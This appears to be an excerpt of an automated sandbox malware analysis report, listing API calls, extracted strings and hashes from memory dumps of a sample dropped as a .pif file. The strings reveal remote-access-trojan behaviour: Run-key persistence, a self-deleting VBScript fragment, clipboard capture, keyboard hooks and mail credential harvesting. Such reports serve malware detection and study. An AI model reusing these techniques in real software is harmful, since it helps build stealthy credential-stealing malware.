APIs
• GetCurrentProcess.KERNEL32(?,?,14644A8A,?,14652238,0000000C,14644BBD,00000000,00000000,00000001,14642082,14652108,0000000C,14641F3A,?), ref: 14644AD5
• TerminateProcess.KERNEL32(00000000,?,14644A8A,?,14652238,0000000C,14644BBD,00000000,00000000,00000001,14642082,14652108,0000000C,14641F3A,?), ref: 14644ADC
• ExitProcess.KERNEL32 ref: 14644AEE
Memory Dump Source
• Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
• Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: 963819a694bcc1539e3d2d00772d3d43af7752de524663cf03860bd13ded104a
• Instruction ID: 900b338158f01663df4267886e4e406d921147b0e453c9650ab5f91823f7dbb3
• Opcode Fuzzy Hash: 963819a694bcc1539e3d2d00772d3d43af7752de524663cf03860bd13ded104a
• Instruction Fuzzy Hash: CFE04F35400114AFCF126F14DD89A493B2DEF60749B284024F90447561CB35EC83CA44
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetCurrentProcess.KERNEL32(?,?,1237328B,?), ref: 123732D6
• TerminateProcess.KERNEL32(00000000,?,1237328B,?), ref: 123732DD
• ExitProcess.KERNEL32 ref: 123732EF
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
                                                                                                                                                                                          • Opcode ID: 2f5af13b26b6cd7b5a5941550b32dc10ba4181751858d391d4334185892dca7c
                                                                                                                                                                                          • Instruction ID: ad7f27b8e8d91fd5bc9a665bd27ccd94725d30178a94fcc84172f2abd90fcc83
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f5af13b26b6cd7b5a5941550b32dc10ba4181751858d391d4334185892dca7c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 26E0867249118CEFCF125F54CC4DA983B6DFF84751F004614F90A4A220CB3AE941CB81
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • OpenClipboard.USER32(00000000), ref: 1233B711
                                                                                                                                                                                          • GetClipboardData.USER32(0000000D), ref: 1233B71D
                                                                                                                                                                                          • CloseClipboard.USER32 ref: 1233B725
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Clipboard$CloseDataOpen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2058664381-0
                                                                                                                                                                                          • Opcode ID: e38c508bf9d343da422eca1962b1d1f6de5657038e580a3e48bdb28f47c12e17
                                                                                                                                                                                          • Instruction ID: 383e4654ed063a115fa419db9397ed2aa0a2a6a4eb2426f59934913d012a5cf8
                                                                                                                                                                                          • Opcode Fuzzy Hash: e38c508bf9d343da422eca1962b1d1f6de5657038e580a3e48bdb28f47c12e17
                                                                                                                                                                                          • Instruction Fuzzy Hash: E0E01276A857309FD3269B608C88BDA7B99DF91B52F418A18F54DAF284D770C900CAB1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetTimeZoneInformation.KERNEL32(?), ref: 0040111D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InformationTimeZone
                                                                                                                                                                                          • String ID: %c%02d%02d
                                                                                                                                                                                          • API String ID: 565725191-130934884
                                                                                                                                                                                          • Opcode ID: 32cf130213eecde94f51183987d16ea9f05b90516b33602c580cd9a43cce8069
                                                                                                                                                                                          • Instruction ID: db6e9c4b4596cdb9f36f65c264d6bf5f60ea79063c65877f082d70517f5d5989
                                                                                                                                                                                          • Opcode Fuzzy Hash: 32cf130213eecde94f51183987d16ea9f05b90516b33602c580cd9a43cce8069
                                                                                                                                                                                          • Instruction Fuzzy Hash: 67F0C2B2F1222597EB18D56A8C82E5B735ECB49324F1841BAF94DF7390E138DD0086A9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 0-3916222277
                                                                                                                                                                                          • Opcode ID: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                                                                                                                                                                          • Instruction ID: d698cc67ebcda8e1753ef9bc8fd89a4a1712b0b114d5afbe3312bc8b6c1e68d7
                                                                                                                                                                                          • Opcode Fuzzy Hash: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C513D719006098FEB24CFA9D985B9EBFF4FB48314F24856ED419E7264E378A980CF50
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: PkGNG
                                                                                                                                                                                          • API String ID: 0-263838557
                                                                                                                                                                                          • Opcode ID: 2714db990c485d3c482822e4496f4e6700112c11046368f118222e6140812f9a
                                                                                                                                                                                          • Instruction ID: 1d0b61a1534f5a28c866cdf3a94cd12903ffcd6a81b0139a2722384c6c65163a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2714db990c485d3c482822e4496f4e6700112c11046368f118222e6140812f9a
                                                                                                                                                                                          • Instruction Fuzzy Hash: A3E0B632000248FBCF21AF58DD0DA993FAAFB40352F044966F9058B636DB36DD92CE45
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(?,?,00000100), ref: 004018E5
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00401957
                                                                                                                                                                                          • CharLowerBuffA.USER32(?,00000000,?), ref: 00401964
                                                                                                                                                                                          • OpenSemaphoreA.KERNEL32(001F0003,00000000,?), ref: 0040199D
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 004019A7
                                                                                                                                                                                            • Part of subcall function 00401612: RegOpenKeyA.ADVAPI32(80000000,?,?), ref: 0040163A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • Restarting Mercury after apparent abnormal termination, xrefs: 00401C2F
                                                                                                                                                                                          • :\/, xrefs: 00401975
                                                                                                                                                                                          • W, xrefs: 00401B59
                                                                                                                                                                                          • mercury32.pmail.com.run.%.60s, xrefs: 0040193C
                                                                                                                                                                                          • D, xrefs: 00401A77
                                                                                                                                                                                          • Mercury/32 Loader Started, xrefs: 0040192A
                                                                                                                                                                                          • Restarting Mercury after scheduled daily exit, xrefs: 00401C21
                                                                                                                                                                                          • Abnormal terminations continued after attempted recovery - exiting., xrefs: 00401C59
                                                                                                                                                                                          • Multiple sessions from the same install directory detected - terminating, xrefs: 004019BF
                                                                                                                                                                                          • %s\mercury.exe -E, xrefs: 004019E8
                                                                                                                                                                                          • Loader encountered Windows error %d creating Mercury/32 process., xrefs: 00401AD8
                                                                                                                                                                                          • There is already a copy of Mercury/32 running from this directory.Only one copy may be run at a time from any given install directory., xrefs: 004019B3
                                                                                                                                                                                          • %s\m32-ssu.run, xrefs: 00401BEB
                                                                                                                                                                                          • Normal operation restored - resetting counters., xrefs: 00401B93
                                                                                                                                                                                          • Recovery complete - attempting to restart Mercury., xrefs: 00401C7A
                                                                                                                                                                                          • %s\m32.run, xrefs: 00401BB7
                                                                                                                                                                                          • Too many abnormal terminations in time period - attempting recovery., xrefs: 00401C66
                                                                                                                                                                                          • Mercury/32 Loader shutting down., xrefs: 00401C93
                                                                                                                                                                                          • Mercury/32 Loader Error, xrefs: 004019AE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Open$BuffCharCloseFileHandleLowerModuleNameSemaphorelstrlen
• String ID: %s\m32-ssu.run$%s\m32.run$%s\mercury.exe -E$:\/$Abnormal terminations continued after attempted recovery - exiting.$D$Loader encountered Windows error %d creating Mercury/32 process.$Mercury/32 Loader Error$Mercury/32 Loader Started$Mercury/32 Loader shutting down.$Multiple sessions from the same install directory detected - terminating$Normal operation restored - resetting counters.$Recovery complete - attempting to restart Mercury.$Restarting Mercury after apparent abnormal termination$Restarting Mercury after scheduled daily exit$There is already a copy of Mercury/32 running from this directory.Only one copy may be run at a time from any given install directory.$Too many abnormal terminations in time period - attempting recovery.$W$mercury32.pmail.com.run.%.60s
• API String ID: 527459832-2152591341
• Opcode ID: b0d4473151f15ca73830767efba8d346a64182bbbe90ef72b456baf54c05cbdd
• Instruction ID: 9b5fbd67cbc3e190377a54b581c7df8cf1cf74e5fc47f7b393678a9f4ffd1dd2
• Opcode Fuzzy Hash: b0d4473151f15ca73830767efba8d346a64182bbbe90ef72b456baf54c05cbdd
• Instruction Fuzzy Hash: 82A19AB19443196ADB10E7A18C43FEA73789F44704F1045BFF644B61D2EBBC96888EAD
Uniqueness

Uniqueness Score: -1.00%

APIs
• mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 1234B13C
• mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 1234B150
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,123960A4), ref: 1234B178
• PathFileExistsW.SHLWAPI(00000000,00000000,00000000,123A4EE0,00000000), ref: 1234B18E
• mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 1234B1CF
• mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 1234B1E7
• mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 1234B1FC
• SetEvent.KERNEL32 ref: 1234B219
• WaitForSingleObject.KERNEL32(000001F4), ref: 1234B22A
• CloseHandle.KERNEL32 ref: 1234B23A
• mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 1234B25C
• mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 1234B266
Strings
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
• String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
• API String ID: 738084811-1354618412
• Opcode ID: 3346f35e356ac6c7a744b53d370f61b51a8bf87c58edbfd3ed28f790061be05d
• Instruction ID: aaeab8e4310ad0c48829dfd6c726097398192754f53b34e7203b37d985ab296f
• Opcode Fuzzy Hash: 3346f35e356ac6c7a744b53d370f61b51a8bf87c58edbfd3ed28f790061be05d
• Instruction Fuzzy Hash: EB51E3B76442446FD665A730CC90EBF37ADEB85355F104A29F14A86190EF20AE08C762
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 12342850: TerminateProcess.KERNEL32(00000000,pth_unenc,1233F8C8), ref: 12342860
  • Part of subcall function 12342850: WaitForSingleObject.KERNEL32(000000FF), ref: 12342873
• GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,123A52F0,?,pth_unenc), ref: 1233D1A5
• RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 1233D1B8
• SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,123A52F0,?,pth_unenc), ref: 1233D1E8
• SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,123A52F0,?,pth_unenc), ref: 1233D1F7
  • Part of subcall function 1233B8AC: TerminateThread.KERNEL32(Function_0000A27D,00000000,123A52F0,pth_unenc,1233D0B8,123A52D8,123A52F0,?,pth_unenc), ref: 1233B8BB
  • Part of subcall function 1233B8AC: UnhookWindowsHookEx.USER32(123A50F0), ref: 1233B8C7
  • Part of subcall function 1233B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 1233B8D5
  • Part of subcall function 1234B978: GetCurrentProcessId.KERNEL32(00000000,771B3530,00000000,?,?,?,?,12396468,1233D20D,.vbs,?,?,?,?,?,123A52F0), ref: 1234B99F
• ShellExecuteW.SHELL32(00000000,open,00000000,12396468,12396468,00000000), ref: 1233D412
• ExitProcess.KERNEL32 ref: 1233D419
Strings
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
• String ID: ")$.vbs$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
• API String ID: 3797177996-3018399277
• Opcode ID: 8c1309cec531426f92d2233474ba08b2f264e448bae47fa13f278ce7c10a4e25
• Instruction ID: 1940e927fc56a1b2d018cecce4607e169dde330db61656635eeb830ed6ca67bc
• Opcode Fuzzy Hash: 8c1309cec531426f92d2233474ba08b2f264e448bae47fa13f278ce7c10a4e25
• Instruction Fuzzy Hash: 0F81947B6043405FD7AAE720DC54AFF77A9AF95302F50492DE086972D0EF24AF09C692
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\Public\Libraries\wkrriuhD.pif,00000001,1233764D,C:\Users\Public\Libraries\wkrriuhD.pif,00000003,12337675,123A52D8,123376CE), ref: 12337284
• GetProcAddress.KERNEL32(00000000), ref: 1233728D
• GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 123372A2
• GetProcAddress.KERNEL32(00000000), ref: 123372A5
• GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 123372B6
• GetProcAddress.KERNEL32(00000000), ref: 123372B9
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 123372CA
• GetProcAddress.KERNEL32(00000000), ref: 123372CD
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 123372DE
• GetProcAddress.KERNEL32(00000000), ref: 123372E1
• GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 123372F2
• GetProcAddress.KERNEL32(00000000), ref: 123372F5
Strings
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: AddressHandleModuleProc
• String ID: C:\Users\Public\Libraries\wkrriuhD.pif$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
• API String ID: 1646373207-3749497233
• Opcode ID: be103768801afa19bedf7ef3439723dd266a0c089968dd8c18e5972c4c0fd8db
• Instruction ID: 04322883a49d478bb1b57bef8bd1398d444112e507df4c466138de3dd3178d4a
• Opcode Fuzzy Hash: be103768801afa19bedf7ef3439723dd266a0c089968dd8c18e5972c4c0fd8db
• Instruction Fuzzy Hash: 9D0175F2D9633A6EEB076B3A4C94D4B6FDC9E912523064D37F809D2102EE78C401DE60
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 14641CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 14641D1B
  • Part of subcall function 14641CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 14641D37
  • Part of subcall function 14641CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 14641D4B
• _strlen.LIBCMT ref: 14641855
• _strlen.LIBCMT ref: 14641869
• _strlen.LIBCMT ref: 1464188B
• _strlen.LIBCMT ref: 146418AE
• _strlen.LIBCMT ref: 146418C8
Strings
Memory Dump Source
• Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
• Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
Similarity
• API ID: _strlen$File$CopyCreateDelete
• String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
• API String ID: 3296212668-3023110444
• Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
• Instruction ID: a79f6efa6a57e815cb9ff726c5aa28013dcf3589525fdd6ead32ed78ec3b4119
• Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
• Instruction Fuzzy Hash: CB6135B5F01319EFEF12CBE4C844BDEB7B9AF15208F284056D204B7254EB706A46CB5A
Uniqueness

Uniqueness Score: -1.00%

APIs
• lstrlenW.KERNEL32(?), ref: 1234C036
• _memcmp.LIBVCRUNTIME ref: 1234C04E
• lstrlenW.KERNEL32(?), ref: 1234C067
• FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 1234C0A2
• GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 1234C0B5
• QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 1234C0F9
• lstrcmpW.KERNEL32(?,?), ref: 1234C114
• FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 1234C12C
• _wcslen.LIBCMT ref: 1234C13B
• FindVolumeClose.KERNEL32(?), ref: 1234C15B
• GetLastError.KERNEL32 ref: 1234C173
• GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 1234C1A0
• lstrcatW.KERNEL32(?,?), ref: 1234C1B9
• lstrcpyW.KERNEL32(?,?), ref: 1234C1C8
• GetLastError.KERNEL32 ref: 1234C1D0
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                                                                                                                          • String ID: ?
                                                                                                                                                                                          • API String ID: 3941738427-1684325040
                                                                                                                                                                                          • Opcode ID: 7e210bf982852010391deeb4bceac2a14e486fa02cc38b745c4577cedc56cb00
                                                                                                                                                                                          • Instruction ID: f1ea35c76abb9b87f635db7163760eefe63e85b7ac510883b35a15238416bcd0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e210bf982852010391deeb4bceac2a14e486fa02cc38b745c4577cedc56cb00
                                                                                                                                                                                          • Instruction Fuzzy Hash: FD41AD72508386ABD711DF60DC8CAEBB7ECAB94354F100E6AF545C6260EB70D649CBD2
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
• Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
Similarity
• API ID: _strlen
• String ID: %m$~$Gon~$~F@7$~dra
• API String ID: 4218353326-230879103
• Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
• Instruction ID: 6abd7122bab287562c8caae9ecc3c0f731cb59c75c3f39c77b2c9c4cb12392d4
• Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
• Instruction Fuzzy Hash: 16715AB5D012689BDF12DBB48C88ADF7BFC9F15248F3800A6D644E7241E634E785CBA4
Uniqueness

Uniqueness Score: -1.00%

APIs
• _free.LIBCMT ref: 005E20E1
• ___free_lconv_mon.LIBCMT ref: 005E20EC
  • Part of subcall function 005E12E4: _free.LIBCMT ref: 005E1301
  • Part of subcall function 005E12E4: _free.LIBCMT ref: 005E1313
  • Part of subcall function 005E12E4: _free.LIBCMT ref: 005E1325
  • Part of subcall function 005E12E4: _free.LIBCMT ref: 005E1337
  • Part of subcall function 005E12E4: _free.LIBCMT ref: 005E1349
  • Part of subcall function 005E12E4: _free.LIBCMT ref: 005E135B
  • Part of subcall function 005E12E4: _free.LIBCMT ref: 005E136D
  • Part of subcall function 005E12E4: _free.LIBCMT ref: 005E137F
  • Part of subcall function 005E12E4: _free.LIBCMT ref: 005E1391
  • Part of subcall function 005E12E4: _free.LIBCMT ref: 005E13A3
  • Part of subcall function 005E12E4: _free.LIBCMT ref: 005E13B5
  • Part of subcall function 005E12E4: _free.LIBCMT ref: 005E13C7
  • Part of subcall function 005E12E4: _free.LIBCMT ref: 005E13D9
• _free.LIBCMT ref: 005E2103
• _free.LIBCMT ref: 005E2118
• _free.LIBCMT ref: 005E2123
• _free.LIBCMT ref: 005E2145
• _free.LIBCMT ref: 005E2158
• _free.LIBCMT ref: 005E2166
• _free.LIBCMT ref: 005E2171
• _free.LIBCMT ref: 005E21A9
• _free.LIBCMT ref: 005E21B0
• _free.LIBCMT ref: 005E21CD
• _free.LIBCMT ref: 005E21E5
Strings
Memory Dump Source
• Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: _free$___free_lconv_mon
• String ID: {-Y
• API String ID: 3658870901-2507730204
• Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
• Instruction ID: 34bdb5e0b08a1299267ba867f448d25e9e147060f7045b699592811197840f72
• Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
• Instruction Fuzzy Hash: 60318E32504346DFDB399B3AE809B5A7BE8FB44310F14845BE588C7251EE30AA80CA15
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 1234C6B1
• RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 1234C6F5
• RegCloseKey.ADVAPI32(?), ref: 1234C9BF
Strings
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: CloseEnumOpen
• String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
• API String ID: 1332880857-3714951968
• Opcode ID: fd5e4d681d52087b1afcd1d95d589394e7ee2d523ccb08fa54279759c478f94d
• Instruction ID: e7c2289b7bea4ee1400fc0c45d248ee15b7157958093b5662c0a208cb4b87265
• Opcode Fuzzy Hash: fd5e4d681d52087b1afcd1d95d589394e7ee2d523ccb08fa54279759c478f94d
• Instruction Fuzzy Hash: C581FA761083859BD376DB10D890EFFB7E8BF94305F504A2DE58A83150EF34AA49CB92
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: _free$_wcschr
• String ID:
• API String ID: 565560161-0
• Opcode ID: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
• Instruction ID: 19898082a1f98bed5a5a5c0874f508314217be3d7ebbb75180ec5fbfa3cb8ff8
• Opcode Fuzzy Hash: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
• Instruction Fuzzy Hash: C3D13671D00341AFDB38AF7AD949A6E7FA4BF05320F04556FEA84A73C1E6B189808B51
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
